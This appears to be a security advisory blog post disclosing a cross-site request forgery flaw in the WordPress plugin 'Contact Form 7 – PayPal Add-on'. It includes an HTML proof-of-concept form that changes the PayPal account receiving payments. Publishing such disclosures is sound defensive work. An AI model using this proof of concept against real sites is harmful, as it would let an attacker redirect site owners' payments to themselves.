12 Jun

Cross-Site Request Forgery (CSRF) Vulnerability in Contact Form 7 – PayPal Add-on

After noticing a number of vulnerabilities in a couple of plugins that work with the plugin Contact Form 7 we started looking over other plugins that work with it. In doing that we found that the plugin Contact Form 7 – PayPal Add-on has a cross-site request forgery (CSRF) vulnerability in its code to save the plugin’s settings, which could be used to change the PayPal account that payments through the plugin are sent.

The issue is caused by a lack of a nonce in the form to change the plugin’s settings and a lack of a check to make sure a valid one is included when saving the plugin’s settings. When the plugin’s settings are saved through a request to plugin’s admin page the only thing that is required is that a POST input named “update” is included (in the file /paypal.php):

356
357
// save and update options
if (isset($_POST['update'])) {

We notified the developer of the issue several weeks ago, but so far we have not heard back from them, other than an automated response, and the vulnerability has not been fixed.

Proof of Concept

The following proof of concept will cause the PayPal account that payments go to, to be changed to test@example.com, when submitted as an Administrator.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="http://[path to WordPress]/wp-admin/admin.php?page=cf7pp_admin_table" method="POST">
<input type="hidden" name="update" value="1" />
<input type="hidden" name="liveaccount" value="test@example.com" />
<input type="submit" name="submit" value="Submit" />
</form>
</body>
</html>

Timeline

  • May 18, 2017 – Developer notified.